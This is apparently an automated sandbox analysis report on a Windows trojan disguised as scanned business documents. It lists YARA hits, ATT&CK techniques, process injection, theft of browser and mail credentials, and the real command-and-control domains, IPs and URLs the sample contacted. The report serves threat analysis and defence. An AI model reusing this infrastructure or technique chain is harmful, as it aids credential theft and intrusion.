            Source: Yara matchFile source: 00000004.00000002.4110797200.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4111043032.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1951519783.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4111935021.0000000003C90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4111848670.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4113899205.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1951562901.0000000004990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_00301204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00301204
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_00301806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00301806

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		1
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Scheduled Task/Job            		2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAt1
            Scheduled Task/Job            		1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets241
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials12
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
            Scheduled Task/Job            		12
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1488022 Sample: Scanned Docs from Emnes Met... Startdate: 05/08/2024 Architecture: WINDOWS Score: 100 28 www.winkthree.com 2->28 30 www.synergon.space 2->30 32 18 other IPs or domains 2->32 42 Malicious sample detected (through community Yara rule) 2->42 44 Antivirus detection for URL or domain 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 7 other signatures 2->48 10 Scanned Docs from Emnes Metal Sdn Bhd_.exe 4 2->10         started        signatures3 process4 signatures5 60 Binary is likely a compiled AutoIt script file 10->60 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 13 svchost.exe 10->13         started        process6 signatures7 66 Maps a DLL or memory area into another process 13->66 16 MHFAGZiftf.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 schtasks.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Modifies the context of a thread in another process (thread injection) 19->54 56 3 other signatures 19->56 22 MHFAGZiftf.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.slushcafe.top 203.161.55.102, 55423, 55424, 55425 VNPT-AS-VNVNPTCorpVN Malaysia 22->34 36 www.tqfabxah.com 35.241.42.217, 55431, 55432, 55433 GOOGLEUS United States 22->36 38 8 other IPs or domains 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Scanned Docs from Emnes Metal Sdn Bhd_.exe71%ReversingLabsWin32.Trojan.Strictor
            Scanned Docs from Emnes Metal Sdn Bhd_.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark0%URL Reputationsafe
            https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js0%URL Reputationsafe
            https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js0%URL Reputationsafe
            https://track.uc.cn/collect0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://hm.baidu.com/hm.js?0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css0%URL Reputationsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            http://www.synergon.space/8unq/?GTP=uhqpjxIPh&efM=RkvL3PdT4df/OPkNHI4HmdhQbyPIEJeZ27MerosBZGKwWjBg2nbmkc0XZ9UwXf1WVngj3AiTKIg7OIM24x6mviVClJubTHF4ksIetQZZ+rgXL6Dldbwq0cw=0%Avira URL Cloudsafe
            http://www.slushcafe.top/irn0/?efM=rkk12BbGqxBZ8yyVdqr4fumsqySnbS/TKAT51RD3LUS3uLR6Pe1z8Bplr8mj2yMFe4BX6hO/FEyyRDMjbgdycpy6GTweDeod91OQcupKfuQbLLwzDVUdZDA=&GTP=uhqpjxIPh0%Avira URL Cloudsafe
            http://www.alanbeanart.com/7ie4/0%Avira URL Cloudsafe
            http://www.lfghtko.lol/yxos/0%Avira URL Cloudsafe
            http://lecoinsa.net/7ffx/?GTP=uhqpjxIPh&efM=bNQ0/ONSUiz8CveulmeeGbtq0%Avira URL Cloudsafe
            http://www.mqmsqkw.lol/jda9/0%Avira URL Cloudsafe
            http://www.zhuan-tou.com/pjmu/?efM=zh3d17Jww7lUdSTn18h3AW52xQeHiultGm9RdVCgVGhfN4W3cKL6T1z80tBiQSN9EuR6w+tbLdSr4eDL0g7GYgJ6QddEnX3CYXXMD+mGHjpcx+XzQAKiSmY=&GTP=uhqpjxIPh0%Avira URL Cloudsafe
            http://www.lecoinsa.net/7ffx/?GTP=uhqpjxIPh&efM=bNQ0/ONSUiz8CveulmeeGbtq+RYAIRndZ9NU1FoLXha3tv70s5bqu4Q6Bv5eGpaoTDYvbrT1RjV74F6wZTVOAhq5NAvf33Q9AnwF2+P6bz1BMUvu37pM7qc=0%Avira URL Cloudsafe
            http://www.rtrpodcast.online/l2ei/100%Avira URL Cloudmalware
            http://www.a9jcpf.top/mpex/?GTP=uhqpjxIPh&efM=Zb/vXsPYNAfjWKU5b+Nt30TyxsxOl11zNhfSVr6onri574wTGgCf5cxGoeAVsjx/n1bbhUl7cIXTAf7wH/T3DCw+G1Vpb7KEKzC8l577KkftecMR999sDYI=0%Avira URL Cloudsafe
            http://www.lfghtko.lol0%Avira URL Cloudsafe
            http://www.lecoinsa.net/7ffx/0%Avira URL Cloudsafe
            http://www.alanbeanart.com/7ie4/?efM=dUG4+DDdp/sjDloXxs11bKdjpfE9KTK2XiMiOZkD44FSjL1BUJC0B7Zb9pCmeCfVXkmAFvPPogGRRoivKVhLz246S+DRLpxSbmoiTCF0OJgE4T3/Jv+1c2k=&GTP=uhqpjxIPh0%Avira URL Cloudsafe
            https://dhosting.pl/bledyhttp/domeny.html0%Avira URL Cloudsafe
            https://dhosting.pl/img/logo.svg0%Avira URL Cloudsafe
            http://www.8xbe578.app/1nsp/?efM=6szqGuj1zCBS7eEVX649iJVBUL/fWzE2u/M2YSpUojnZUd8wkmCllhvxE7Evl1FAmV96l4GO8z837fuNk080Ir9qaLZUnG7yNOEpMTkzRXgFx77GcbRli0I=&GTP=uhqpjxIPh0%Avira URL Cloudsafe
            http://www.slushcafe.top/irn0/0%Avira URL Cloudsafe
            http://www.kacotae.com/rdfm/?GTP=uhqpjxIPh&efM=wrkGspiQ383g8BvQawprffb7FcgpmXJxXTgxDOVN343rP+tlYZO/fXuOHfGNTjam/0/D7Ya5sDuP+VmElkMvZFoLMOaF6UBG/sMUSe6LmxyUxmV5i7nd1eA=0%Avira URL Cloudsafe
            http://www.zhuan-tou.com/pjmu/0%Avira URL Cloudsafe
            http://www.tqfabxah.com/zjwj/100%Avira URL Cloudmalware
            https://dhosting.pl/kontakt0%Avira URL Cloudsafe
            http://www.a9jcpf.top/mpex/0%Avira URL Cloudsafe
            https://dhosting.pl0%Avira URL Cloudsafe
            https://dhosting.pl/bledyhttp/hosting.html0%Avira URL Cloudsafe
            http://www.stemfiniti.com/toda/?GTP=uhqpjxIPh&efM=obOL9JCgNxwS4++cuMdB8oKy9gH02j2g0sHVZkybihQ0FoV35C0OF1DRqfJh8iiswTwJQUV87m+YN/qkLbPeZjD4+ekebMUnDMBnOUVwsozzcXjkZdwt+Kw=0%Avira URL Cloudsafe
            http://www.kacotae.com/rdfm/0%Avira URL Cloudsafe
            http://lecoinsa.net/7ffx/?GTP=uhqpjxIPh&amp;efM=bNQ0/ONSUiz8CveulmeeGbtq0%Avira URL Cloudsafe
            http://www.8xbe578.app/1nsp/0%Avira URL Cloudsafe
            http://www.lfghtko.lol/yxos/?efM=GsI4mtIQVr1bqd+V/1qEiGWG2JWSdng8JQsV9k25RNexwN7KNHOmJ2uIpR4VD7Ui+v6cwkDz1p2XqdzqrAR32o8KijRXgfnfSTbVFHsQqIz2A3ZpJ0HUFH4=&GTP=uhqpjxIPh0%Avira URL Cloudsafe
            http://www.synergon.space/8unq/0%Avira URL Cloudsafe
            http://www.mqmsqkw.lol/jda9/?GTP=uhqpjxIPh&efM=34snQIO0a+qzYlkt+6IEft1gxD/ZK6L7qOToIJHZshoLhvuGziw8TW5Od2ToMUc/iXvMW07TMOYG4pWJ/ehZbdqmuEYhDCzj/N3rZv+VTG2UiN/ilnh8230=0%Avira URL Cloudsafe
            http://www.tqfabxah.com/zjwj/?efM=nHLCZn8vN2ArVDTtuX5SJ0P/P5D3rwrWV4l8hQoFqQuK0GTLFPexr5xj3EirNaSr0bv3za4OohaILLkKIoyZBj+QLQEglA9+lHyHnT+4OAarv/Cw0xbxNAM=&GTP=uhqpjxIPh100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            kmdne.ajunsdfancsda.com
            		216.83.33.140
            		truefalse
              		unknown
              stemfiniti.com
              		3.33.130.190
              		truefalse
                		unknown
                www.lfghtko.lol
                		116.213.43.190
                		truefalse
                  		unknown
                  8xbe578.app
                  		3.33.130.190
                  		truefalse
                    		unknown
                    alanbeanart.com
                    		3.33.130.190
                    		truefalse
                      		unknown
                      www.mqmsqkw.lol
                      		116.213.43.190
                      		truefalse
                        		unknown
                        www.zhuan-tou.com
                        		38.12.1.29
                        		truefalse
                          		unknown
                          rtrpodcast.online
                          		76.223.67.189
                          		truefalse
                            		unknown
                            www.tqfabxah.com
                            		35.241.42.217
                            		truefalse
                              		unknown
                              www.lecoinsa.net
                              		217.116.0.191
                              		truefalse
                                		unknown
                                synergon.space
                                		109.95.158.127
                                		truefalse
                                  		unknown
                                  www.slushcafe.top
                                  		203.161.55.102
                                  		truefalse
                                    		unknown
                                    www.kacotae.com
                                    		64.226.69.42
                                    		truefalse
                                      		unknown
                                      www.alanbeanart.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.stemfiniti.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.a9jcpf.top
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.winkthree.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.rtrpodcast.online
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.synergon.space
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.8xbe578.app
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown

                                                    Contacted URLs

                                                    NameMaliciousAntivirus DetectionReputation
                                                    http://www.synergon.space/8unq/?GTP=uhqpjxIPh&efM=RkvL3PdT4df/OPkNHI4HmdhQbyPIEJeZ27MerosBZGKwWjBg2nbmkc0XZ9UwXf1WVngj3AiTKIg7OIM24x6mviVClJubTHF4ksIetQZZ+rgXL6Dldbwq0cw=false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.slushcafe.top/irn0/?efM=rkk12BbGqxBZ8yyVdqr4fumsqySnbS/TKAT51RD3LUS3uLR6Pe1z8Bplr8mj2yMFe4BX6hO/FEyyRDMjbgdycpy6GTweDeod91OQcupKfuQbLLwzDVUdZDA=&GTP=uhqpjxIPhfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.mqmsqkw.lol/jda9/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.zhuan-tou.com/pjmu/?efM=zh3d17Jww7lUdSTn18h3AW52xQeHiultGm9RdVCgVGhfN4W3cKL6T1z80tBiQSN9EuR6w+tbLdSr4eDL0g7GYgJ6QddEnX3CYXXMD+mGHjpcx+XzQAKiSmY=&GTP=uhqpjxIPhfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.alanbeanart.com/7ie4/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.lfghtko.lol/yxos/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.a9jcpf.top/mpex/?GTP=uhqpjxIPh&efM=Zb/vXsPYNAfjWKU5b+Nt30TyxsxOl11zNhfSVr6onri574wTGgCf5cxGoeAVsjx/n1bbhUl7cIXTAf7wH/T3DCw+G1Vpb7KEKzC8l577KkftecMR999sDYI=false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.rtrpodcast.online/l2ei/false
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.lecoinsa.net/7ffx/?GTP=uhqpjxIPh&efM=bNQ0/ONSUiz8CveulmeeGbtq+RYAIRndZ9NU1FoLXha3tv70s5bqu4Q6Bv5eGpaoTDYvbrT1RjV74F6wZTVOAhq5NAvf33Q9AnwF2+P6bz1BMUvu37pM7qc=false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.lecoinsa.net/7ffx/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.8xbe578.app/1nsp/?efM=6szqGuj1zCBS7eEVX649iJVBUL/fWzE2u/M2YSpUojnZUd8wkmCllhvxE7Evl1FAmV96l4GO8z837fuNk080Ir9qaLZUnG7yNOEpMTkzRXgFx77GcbRli0I=&GTP=uhqpjxIPhfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.alanbeanart.com/7ie4/?efM=dUG4+DDdp/sjDloXxs11bKdjpfE9KTK2XiMiOZkD44FSjL1BUJC0B7Zb9pCmeCfVXkmAFvPPogGRRoivKVhLz246S+DRLpxSbmoiTCF0OJgE4T3/Jv+1c2k=&GTP=uhqpjxIPhfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.slushcafe.top/irn0/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.kacotae.com/rdfm/?GTP=uhqpjxIPh&efM=wrkGspiQ383g8BvQawprffb7FcgpmXJxXTgxDOVN343rP+tlYZO/fXuOHfGNTjam/0/D7Ya5sDuP+VmElkMvZFoLMOaF6UBG/sMUSe6LmxyUxmV5i7nd1eA=false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.zhuan-tou.com/pjmu/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.a9jcpf.top/mpex/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.tqfabxah.com/zjwj/false
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.stemfiniti.com/toda/?GTP=uhqpjxIPh&efM=obOL9JCgNxwS4++cuMdB8oKy9gH02j2g0sHVZkybihQ0FoV35C0OF1DRqfJh8iiswTwJQUV87m+YN/qkLbPeZjD4+ekebMUnDMBnOUVwsozzcXjkZdwt+Kw=false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.kacotae.com/rdfm/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.8xbe578.app/1nsp/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.mqmsqkw.lol/jda9/?GTP=uhqpjxIPh&efM=34snQIO0a+qzYlkt+6IEft1gxD/ZK6L7qOToIJHZshoLhvuGziw8TW5Od2ToMUc/iXvMW07TMOYG4pWJ/ehZbdqmuEYhDCzj/N3rZv+VTG2UiN/ilnh8230=false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.lfghtko.lol/yxos/?efM=GsI4mtIQVr1bqd+V/1qEiGWG2JWSdng8JQsV9k25RNexwN7KNHOmJ2uIpR4VD7Ui+v6cwkDz1p2XqdzqrAR32o8KijRXgfnfSTbVFHsQqIz2A3ZpJ0HUFH4=&GTP=uhqpjxIPhfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.synergon.space/8unq/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.tqfabxah.com/zjwj/?efM=nHLCZn8vN2ArVDTtuX5SJ0P/P5D3rwrWV4l8hQoFqQuK0GTLFPexr5xj3EirNaSr0bv3za4OohaILLkKIoyZBj+QLQEglA9+lHyHnT+4OAarv/Cw0xbxNAM=&GTP=uhqpjxIPhfalse
                                                    • Avira URL Cloud: malware
                                                    		unknown

                                                    URLs from Memory and Binaries

                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    https://duckduckgo.com/chrome_newtabschtasks.exe, 00000004.00000002.4114680149.0000000007EEE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://lecoinsa.net/7ffx/?GTP=uhqpjxIPh&efM=bNQ0/ONSUiz8CveulmeeGbtqschtasks.exe, 00000004.00000002.4112702566.00000000043B8000.00000004.10000000.00040000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.0000000002DB8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://download.quark.cn/download/quarkpc?platform=android&ch=pcquarkschtasks.exe, 00000004.00000002.4112702566.0000000004EB6000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000004.00000002.4114511435.0000000006400000.00000004.00000800.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000038B6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.jsschtasks.exe, 00000004.00000002.4114511435.0000000006400000.00000004.00000800.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000038B6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://duckduckgo.com/ac/?q=schtasks.exe, 00000004.00000002.4114680149.0000000007EEE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.jsschtasks.exe, 00000004.00000002.4112702566.0000000004EB6000.00000004.10000000.00040000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000038B6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://track.uc.cn/collectschtasks.exe, 00000004.00000002.4112702566.0000000004EB6000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000004.00000002.4114511435.0000000006400000.00000004.00000800.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000038B6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=schtasks.exe, 00000004.00000002.4114680149.0000000007EEE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=schtasks.exe, 00000004.00000002.4114680149.0000000007EEE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://dhosting.pl/bledyhttp/domeny.htmlschtasks.exe, 00000004.00000002.4112702566.00000000046DC000.00000004.10000000.00040000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000030DC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.ecosia.org/newtab/schtasks.exe, 00000004.00000002.4114680149.0000000007EEE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.lfghtko.lolMHFAGZiftf.exe, 00000007.00000002.4113899205.0000000004B78000.00000040.80000000.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.jsschtasks.exe, 00000004.00000002.4112702566.0000000004EB6000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000004.00000002.4114511435.0000000006400000.00000004.00000800.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000038B6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://ac.ecosia.org/autocomplete?q=schtasks.exe, 00000004.00000002.4114680149.0000000007EEE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://dhosting.pl/img/logo.svgschtasks.exe, 00000004.00000002.4112702566.00000000046DC000.00000004.10000000.00040000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000030DC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://dhosting.pl/kontaktMHFAGZiftf.exe, 00000007.00000002.4112168789.00000000030DC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://hm.baidu.com/hm.js?schtasks.exe, 00000004.00000002.4112702566.0000000004EB6000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000004.00000002.4114511435.0000000006400000.00000004.00000800.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000038B6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchschtasks.exe, 00000004.00000002.4114680149.0000000007EEE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://dhosting.plMHFAGZiftf.exe, 00000007.00000002.4112168789.00000000030DC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://dhosting.pl/bledyhttp/hosting.htmlschtasks.exe, 00000004.00000002.4112702566.00000000046DC000.00000004.10000000.00040000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000030DC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.jsschtasks.exe, 00000004.00000002.4112702566.0000000004EB6000.00000004.10000000.00040000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000038B6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://lecoinsa.net/7ffx/?GTP=uhqpjxIPh&amp;efM=bNQ0/ONSUiz8CveulmeeGbtqMHFAGZiftf.exe, 00000007.00000002.4112168789.0000000002DB8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=schtasks.exe, 00000004.00000002.4114680149.0000000007EEE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.cssschtasks.exe, 00000004.00000002.4112702566.0000000004EB6000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000004.00000002.4114511435.0000000006400000.00000004.00000800.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000038B6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    35.241.42.217
                                                    		www.tqfabxah.comUnited States
                                                    		15169GOOGLEUSfalse
                                                    217.116.0.191
                                                    		www.lecoinsa.netSpain
                                                    		16371ACENS_ASSpainHostinghousingandVPNservicesESfalse
                                                    76.223.67.189
                                                    		rtrpodcast.onlineUnited States
                                                    		16509AMAZON-02USfalse
                                                    203.161.55.102
                                                    		www.slushcafe.topMalaysia
                                                    		45899VNPT-AS-VNVNPTCorpVNfalse
                                                    38.12.1.29
                                                    		www.zhuan-tou.comUnited States
                                                    		174COGENT-174USfalse
                                                    64.226.69.42
                                                    		www.kacotae.comCanada
                                                    		13768COGECO-PEER1CAfalse
                                                    109.95.158.127
                                                    		synergon.spacePoland
                                                    		48896DHOSTING-ASWarsawPolandPLfalse
                                                    3.33.130.190
                                                    		stemfiniti.comUnited States
                                                    		8987AMAZONEXPANSIONGBfalse
                                                    216.83.33.140
                                                    		kmdne.ajunsdfancsda.comUnited States
                                                    		64050BCPL-SGBGPNETGlobalASNSGfalse
                                                    116.213.43.190
                                                    		www.lfghtko.lolHong Kong
                                                    		63889CLOUDIVLIMITED-ASCloudIvLimitedHKfalse

                                                    General Information

                                                    Joe Sandbox version:40.0.0 Tourmaline
                                                    Analysis ID:1488022
                                                    Start date and time:2024-08-05 15:29:44 +02:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 10m 55s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:8
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
